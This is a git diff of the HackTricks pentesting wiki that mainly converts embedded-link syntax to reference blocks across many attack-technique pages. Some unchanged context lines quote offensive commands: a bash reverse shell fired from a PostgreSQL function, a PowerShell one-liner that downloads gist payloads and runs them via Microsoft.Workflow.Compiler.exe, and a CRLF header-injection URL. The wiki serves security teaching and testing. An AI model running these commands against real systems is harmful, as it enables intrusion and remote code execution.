@ -132,7 +131,9 @@ powershell C:**2\n??e*d.*? # notepad
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt
{{#endref}}
## References
@ -140,7 +141,3 @@ powershell C:**2\n??e*d.*? # notepad
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
{{#include ../banners/hacktricks-training.md}}

11
src/pentesting-web/crlf-0d-0a.md
View File

@ -2,8 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
### CRLF
Carriage Return (CR) and Line Feed (LF), collectively known as CRLF, are special character sequences used in the HTTP protocol to denote the end of a line or the start of a new one. Web servers and browsers use CRLF to distinguish between HTTP headers and the body of a response. These characters are universally employed in HTTP/1.1 communications across various web server types, such as Apache and Microsoft IIS.
@ -86,7 +84,9 @@ http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:te
Check more examples in:
{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
{{#ref}}
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
{{#endref}}
### HTTP Header Injection
@ -217,9 +217,4 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj
- [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
- [**https://www.netsparker.com/blog/web-security/crlf-http-header/**](https://www.netsparker.com/blog/web-security/crlf-http-header/)
{{#include ../banners/hacktricks-training.md}}

7
src/pentesting-web/dangling-markup-html-scriptless-injection/README.md
View File

@ -251,7 +251,9 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt
{{#endref}}
## References
@ -261,6 +263,3 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side
- [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)
{{#include ../../banners/hacktricks-training.md}}

7
src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
View File

@ -258,7 +258,9 @@ This vulnerability, identified as CVE-201911358, illustrates how a deep copy
### Another tutorial with CVEs
{% embed url="https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2" %}
{{#ref}}
https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2
{{#endref}}
### Tools to detect Prototype Pollution
@ -392,6 +394,3 @@ To reduce the risk of prototype pollution, the strategies listed below can be em
- [https://blog.p6.is/AST-Injection/](https://blog.p6.is/AST-Injection/)
{{#include ../../../banners/hacktricks-training.md}}

11
src/pentesting-web/file-inclusion/README.md
View File

@ -23,7 +23,9 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
**Mixing several \*nix LFI lists and adding more paths I have created this one:**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
{{#endref}}
Try also to change `/` for `\`\
Try also to add `../../../../../`
@ -34,7 +36,9 @@ A list that uses several techniques to find the file /etc/password (to check if
Merge of different wordlists:
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
{{#endref}}
Try also to change `/` for `\`\
Try also to remove `C:/` and add `../../../../../`
@ -689,6 +693,3 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
{% file src="../../images/EN-Local-File-Inclusion-1.pdf" %}
{{#include ../../banners/hacktricks-training.md}}

11
src/pentesting-web/file-inclusion/phar-deserialization.md
View File

@ -2,8 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
**Phar** files (PHP Archive) files **contain meta data in serialized format**, so, when parsed, this **metadata** is **deserialized** and you can try to abuse a **deserialization** vulnerability inside the **PHP** code.
The best thing about this characteristic is that this deserialization will occur even using PHP functions that do not eval PHP code like **file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize()**.
@ -69,11 +67,8 @@ php vuln.php
### References
{% embed url="https://blog.ripstech.com/2018/new-php-exploitation-technique/" %}
{{#ref}}
https://blog.ripstech.com/2018/new-php-exploitation-technique/
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

9
src/pentesting-web/file-upload/README.md
View File

@ -2,7 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
## File Upload General Methodology
Other useful extensions:
@ -200,7 +199,9 @@ Heres a top 10 list of things that you can achieve by uploading (from [here](
#### Burp Extension
{% embed url="https://github.com/portswigger/upload-scanner" %}
{{#ref}}
https://github.com/portswigger/upload-scanner
{{#endref}}
## Magic Header Bytes
@ -325,8 +326,4 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
- [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
- [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
{{#include ../../banners/hacktricks-training.md}}

12
src/pentesting-web/hacking-jwt-json-web-tokens.md
View File

@ -2,7 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
**Part of this post is based in the awesome post:** [**https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology**](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)\
**Author of the great tool to pentest JWTs** [**https://github.com/ticarpi/jwt_tool**](https://github.com/ticarpi/jwt_tool)
@ -245,7 +244,9 @@ However, imagine a situation where the maximun length of the ID is 4 (0001-9999)
### JWT Registered claims
{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml#claims" %}
{{#ref}}
https://www.iana.org/assignments/jwt/jwt.xhtml#claims
{{#endref}}
### Other attacks
@ -263,9 +264,8 @@ The token's expiry is checked using the "exp" Payload claim. Given that JWTs are
### Tools
{% embed url="https://github.com/ticarpi/jwt_tool" %}
{{#ref}}
https://github.com/ticarpi/jwt_tool
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

9
src/pentesting-web/ldap-injection.md
View File

@ -4,7 +4,6 @@
{{#include ../banners/hacktricks-training.md}}
## LDAP Injection
### **LDAP**
@ -216,10 +215,8 @@ intitle:"phpLDAPadmin" inurl:cmd.php
### More Payloads
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
{{#ref}}
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

9
src/pentesting-web/oauth-to-account-takeover.md
View File

@ -2,7 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information <a href="#d4a8" id="d4a8"></a>
OAuth offers various versions, with foundational insights accessible at [OAuth 2.0 documentation](https://oauth.net/2/). This discussion primarily centers on the widely used [OAuth 2.0 authorization code grant type](https://oauth.net/2/grant-types/authorization-code/), providing an **authorization framework that enables an application to access or perform actions on a user's account in another application** (the authorization server).
@ -158,7 +157,9 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
For more detailed info about how to abuse AWS cognito check:
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum" %}
{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum
{{#endref}}
### Abusing other Apps tokens <a href="#bda5" id="bda5"></a>
@ -231,8 +232,4 @@ If the platform you are testing is an OAuth provider [**read this to test for po
- [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
- [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
{{#include ../banners/hacktricks-training.md}}

7
src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
View File

@ -241,9 +241,8 @@ xslt-server-side-injection-extensible-stylesheet-language-transformations.md
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

17
src/pentesting-web/sql-injection/README.md
View File

@ -2,7 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
## What is SQL injection?
An **SQL injection** is a security flaw that allows attackers to **interfere with database queries** of an application. This vulnerability can enable attackers to **view**, **modify**, or **delete** data they shouldn't access, including information of other users or any data the application can access. Such actions may result in permanent changes to the application's functionality or content or even compromision of the server or denial of service.
@ -143,7 +142,9 @@ Also, if you have access to the output of the query, you could make it **print t
### Identifying with PortSwigger
{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %}
{{#ref}}
https://portswigger.net/web-security/sql-injection/cheat-sheet
{{#endref}}
## Exploiting Union Based
@ -282,7 +283,6 @@ We have already discussed all the ways to exploit a SQL Injection vulnerability.
Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
## Authentication bypass
List to try to bypass the login functionality:
@ -533,7 +533,9 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup
### WAF bypass suggester tools
{% embed url="https://github.com/m4ll0k/Atlas" %}
{{#ref}}
https://github.com/m4ll0k/Atlas
{{#endref}}
## Other Guides
@ -542,10 +544,9 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

7
src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
View File

@ -135,7 +135,9 @@ SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"');
You can find this **library precompiled** to several different PostgreSQL versions and even can **automate this process** (if you have PostgreSQL access) with:
{% embed url="https://github.com/Dionach/pgexec" %}
{{#ref}}
https://github.com/Dionach/pgexec
{{#endref}}
### RCE in Windows
@ -351,6 +353,3 @@ print(" drop function connect_back(text, integer);")
- [https://www.exploit-db.com/papers/13084](https://www.exploit-db.com/papers/13084)
{{#include ../../../banners/hacktricks-training.md}}

8
src/pentesting-web/ssrf-server-side-request-forgery/README.md
View File

@ -369,7 +369,9 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
### To practice
{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
{{#ref}}
https://github.com/incredibleindishell/SSRF_Vulnerable_Lab
{{#endref}}
## References
@ -379,7 +381,3 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
- [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
{{#include ../../banners/hacktricks-training.md}}

7
src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
View File

@ -167,7 +167,9 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) can generate vari
Check out the [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) from portswigger were you can introduce the allowed host and the attackers one and it'll generate a list of URLs to try for you. It also considers if you can use the URL in a parameter, in a Host header or in a CORS header.
{% embed url="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" %}
{{#ref}}
https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet
{{#endref}}
### Bypass via redirect
@ -221,6 +223,3 @@ image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-
- [https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet](https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet)
{{#include ../../banners/hacktricks-training.md}}

10
src/pentesting-web/ssti-server-side-template-injection/README.md
View File

@ -2,7 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
## What is SSTI (Server-Side Template Injection)
Server-side template injection is a vulnerability that occurs when an attacker can inject malicious code into a template that is executed on the server. This vulnerability can be found in various technologies, including Jinja.
@ -466,8 +465,6 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
- More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
##
### Smarty (PHP)
@ -1097,7 +1094,9 @@ If you think it could be useful, read:
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
{{#endref}}
## Practice & References
@ -1106,6 +1105,3 @@ If you think it could be useful, read:
- [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection)
{{#include ../../banners/hacktricks-training.md}}

7
src/pentesting-web/unicode-injection/unicode-normalization.md
View File

@ -79,7 +79,9 @@ Then, a malicious user could insert a different Unicode character equivalent to
#### sqlmap template
{% embed url="https://github.com/carlospolop/sqlmap_to_unicode_template" %}
{{#ref}}
https://github.com/carlospolop/sqlmap_to_unicode_template
{{#endref}}
### XSS (Cross Site Scripting)
@ -104,6 +106,3 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows t
- [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html)
{{#include ../../banners/hacktricks-training.md}}

7
src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
View File

@ -418,7 +418,9 @@ version="1.0">
## **Brute-Force Detection List**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt
{{#endref}}
## **References**
@ -427,6 +429,3 @@ version="1.0">
- [http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20Blackhat%202015.pdf)
{{#include ../banners/hacktricks-training.md}}

13
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -1,6 +1,5 @@
# XSS (Cross Site Scripting)
## Methodology
1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code.
@ -1550,7 +1549,9 @@ shadow-dom.md
### Polyglots
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt
{{#endref}}
### Blind XSS payloads
@ -1619,7 +1620,9 @@ console.log(
### Brute-Force List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt
{{#endref}}
## XSS Abusing other vulnerabilities
@ -1741,8 +1744,4 @@ other-js-tricks.md
- [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
- [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
{{#include ../../banners/hacktricks-training.md}}

13
src/pentesting-web/xxe-xee-xml-external-entity.md
View File

@ -2,7 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
## XML Basics
XML is a markup language designed for data storage and transport, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML's significance has declined with the rise of JSON, despite its initial role in AJAX technology.
@ -228,7 +227,9 @@ For more information check [https://portswigger.net/web-security/xxe/blind](http
In the following awesome github repo you can find **paths of DTDs that can be present in the system**:
{% embed url="https://github.com/GoSecure/dtd-finder/tree/master/list" %}
{{#ref}}
https://github.com/GoSecure/dtd-finder/tree/master/list
{{#endref}}
Moreover, if you have the **Docker image of the victim system**, you can use the tool of the same repo to **scan** the **image** and **find** the path of **DTDs** present inside the system. Read the [Readme of the github](https://github.com/GoSecure/dtd-finder) to learn how.
@ -764,7 +765,9 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
## Tools
{% embed url="https://github.com/luisfontes19/xxexploiter" %}
{{#ref}}
https://github.com/luisfontes19/xxexploiter
{{#endref}}
## References
@ -777,8 +780,4 @@ XMLDecoder is a Java class that creates objects based on a XML message. If a mal
- [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\\
- [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
{{#include ../banners/hacktricks-training.md}}

7
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
View File

@ -17,7 +17,9 @@ Usually, all these structures are faked by making an **initial ROP chain that ca
You can find a better explanation about this technique in the second half of the video:
{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
{{#ref}}
https://youtu.be/ADULSwnQs-s?feature=shared
{{#endref}}
## Structures
@ -63,6 +65,3 @@ p.interactive()
- [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve)
{{#include ../../../banners/hacktricks-training.md}}

7
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md
View File

@ -21,7 +21,9 @@ rop-syscall-execv.md
For a better explanation check also:
{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
{{#ref}}
https://youtu.be/ADULSwnQs-s?feature=shared
{{#endref}}
## Example
@ -60,6 +62,3 @@ p.interactive()
- [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
{{#include ../../../banners/hacktricks-training.md}}

11
src/reversing/reversing-tools-basic-methods/README.md
View File

@ -166,7 +166,9 @@ cheat-engine.md
## ARM & MIPS
{% embed url="https://github.com/nongiach/arm_now" %}
{{#ref}}
https://github.com/nongiach/arm_now
{{#endref}}
## Shellcodes
@ -402,7 +404,9 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
## Game Boy
{% embed url="https://www.youtube.com/watch?v=VVbRe7wr3G4" %}
{{#ref}}
https://www.youtube.com/watch?v=VVbRe7wr3G4
{{#endref}}
## Courses
@ -410,6 +414,3 @@ So, in this challenge, knowing the values of the buttons, you needed to **press
- [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)
{{#include ../../banners/hacktricks-training.md}}

7
src/stego/esoteric-languages.md
View File

@ -52,7 +52,9 @@ Take it to the top
Whisper my world
```
{% embed url="https://codewithrockstar.com/" %}
{{#ref}}
https://codewithrockstar.com/
{{#endref}}
## PETOOH
@ -67,6 +69,3 @@ Kukarek
```
{{#include ../banners/hacktricks-training.md}}

7
src/todo/burp-suite.md
View File

@ -10,11 +10,10 @@
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
{{#ref}}
https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e
{{#endref}}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
{{#include ../banners/hacktricks-training.md}}

7
src/todo/other-web-tricks.md
View File

@ -24,7 +24,9 @@ Register an email, before confirming it change the email, then, if the new confi
### Access Internal servicedesk of companies using atlassian
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
{{#ref}}
https://yourcompanyname.atlassian.net/servicedesk/customer/user/login
{{#endref}}
### TRACE method
@ -33,6 +35,3 @@ Developers might forget to disable various debugging options in the production e
![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png)
{{#include ../banners/hacktricks-training.md}}

95
src/todo/references.md
View File

@ -1,52 +1,95 @@
{{#include ../banners/hacktricks-training.md}}
{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %}
{{#ref}}
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick
{{#endref}}
{% embed url="https://hausec.com/pentesting-cheatsheet/#_Toc475368982" %}
{{#ref}}
https://hausec.com/pentesting-cheatsheet/#_Toc475368982
{{#endref}}
{% embed url="https://anhtai.me/pentesting-cheatsheet/" %}
{{#ref}}
https://anhtai.me/pentesting-cheatsheet/
{{#endref}}
{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %}
{{#ref}}
https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
{{#endref}}
{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %}
{{#ref}}
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
{{#endref}}
{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html" %}
{{#ref}}
https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html
{{#endref}}
{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md" %}
{{#ref}}
https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
{{#endref}}
{% embed url="https://anhtai.me/oscp-fun-guide/" %}
{{#ref}}
https://anhtai.me/oscp-fun-guide/
{{#endref}}
{% embed url="https://www.thehacker.recipes/" %}
{{#ref}}
https://www.thehacker.recipes/
{{#endref}}
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %}
{{#ref}}
https://github.com/swisskyrepo/PayloadsAllTheThings
{{#endref}}
{% embed url="https://gtfobins.github.io/" %}
{{#ref}}
https://gtfobins.github.io/
{{#endref}}
{% embed url="https://github.com/RistBS/Awesome-RedTeam-Cheatsheet" %}
{{#ref}}
https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
{{#endref}}
{% embed url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" %}
{{#ref}}
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
{{#endref}}
{% embed url="https://hideandsec.sh/" %}
{{#ref}}
https://hideandsec.sh/
{{#endref}}
{% embed url="https://cheatsheet.haax.fr/" %}
{{#ref}}
https://cheatsheet.haax.fr/
{{#endref}}
{% embed url="https://infosecwriteups.com/" %}
{{#ref}}
https://infosecwriteups.com/
{{#endref}}
{% embed url="https://www.exploit-db.com/" %}
{{#ref}}
https://www.exploit-db.com/
{{#endref}}
{% embed url="https://wadcoms.github.io/" %}
{{#ref}}
https://wadcoms.github.io/
{{#endref}}
{% embed url="https://lolbas-project.github.io" %}
{{#ref}}
https://lolbas-project.github.io
{{#endref}}
{% embed url="https://pentestbook.six2dez.com/" %}
{{#ref}}
https://pentestbook.six2dez.com/
{{#endref}}
{% embed url="https://www.hackingarticles.in/" %}
{{#ref}}
https://www.hackingarticles.in/
{{#endref}}
{% embed url="https://pentestlab.blog/" %}
{{#ref}}
https://pentestlab.blog/
{{#endref}}
{% embed url="https://ippsec.rocks/" %}
{{#ref}}
https://ippsec.rocks/
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

7
src/windows-hardening/active-directory-methodology/README.md
View File

@ -684,7 +684,9 @@ rdp-sessions-abuse.md
## AD -> Azure & Azure -> AD
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity" %}
{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-lateral-movements/azure-ad-connect-hybrid-identity
{{#endref}}
## Some General Defenses
@ -721,6 +723,3 @@ rdp-sessions-abuse.md
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
{{#include ../../banners/hacktricks-training.md}}

7
src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md
View File

@ -55,7 +55,9 @@ If an attacker has already compromised a computer with [Unconstrained Delegation
## RCP Force authentication
{% embed url="https://github.com/p0dalirius/Coercer" %}
{{#ref}}
https://github.com/p0dalirius/Coercer
{{#endref}}
## PrivExchange
@ -128,6 +130,3 @@ If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlm
&#xNAN;_&#x52;emember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
{{#include ../../banners/hacktricks-training.md}}

8
src/windows-hardening/authentication-credentials-uac-and-efs.md
View File

@ -140,7 +140,9 @@ This way requires the **victim user** to be **running** a **process** inside the
#### Knowing the users password
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
{{#ref}}
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
{{#endref}}
## Group Managed Service Accounts (gMSA)
@ -264,8 +266,4 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
windows-security-controls/uac-user-account-control.md
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

7
src/windows-hardening/authentication-credentials-uac-and-efs/README.md
View File

@ -140,7 +140,9 @@ This way requires the **victim user** to be **running** a **process** inside the
#### Knowing the users password
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
{{#ref}}
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
{{#endref}}
## Group Managed Service Accounts (gMSA)
@ -265,6 +267,3 @@ uac-user-account-control.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

17
src/windows-hardening/av-bypass.md
View File

@ -2,7 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
**This page was written by** [**@m2rc_p**](https://twitter.com/m2rc_p)**!**
## **AV Evasion Methodology**
@ -313,11 +312,15 @@ Every environment you go against will have their own strengths and weaknesses.
I highly encourage you go watch this talk from [@ATTL4S](https://twitter.com/DaniLJ94), to get a foothold into more Advanced Evasion techniques.
{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %}
{{#ref}}
https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo
{{#endref}}
his is also another great talk from [@mariuszbit](https://twitter.com/mariuszbit) about Evasion in Depth.
{% embed url="https://www.youtube.com/watch?v=IbA7Ung39o4" %}
{{#ref}}
https://www.youtube.com/watch?v=IbA7Ung39o4
{{#endref}}
## **Old Techniques**
@ -512,7 +515,9 @@ powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.g
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
```
{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}
{{#ref}}
https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f
{{#endref}}
C# obfuscators list: [https://github.com/NotPrab/.NET-Obfuscator](https://github.com/NotPrab/.NET-Obfuscator)
@ -566,8 +571,4 @@ https://github.com/praetorian-code/vulcan
- [https://github.com/persianhydra/Xeexe-TopAntivirusEvasion](https://github.com/persianhydra/Xeexe-TopAntivirusEvasion)
{{#include ../banners/hacktricks-training.md}}

7
src/windows-hardening/windows-local-privilege-escalation/README.md
View File

@ -1544,7 +1544,9 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
### **From Administrator or Network Service to System**
{% embed url="https://github.com/sailay1996/RpcSsImpersonator" %}
{{#ref}}
https://github.com/sailay1996/RpcSsImpersonator
{{#endref}}
### From LOCAL SERVICE or NETWORK SERVICE to full privs
@ -1618,6 +1620,3 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the
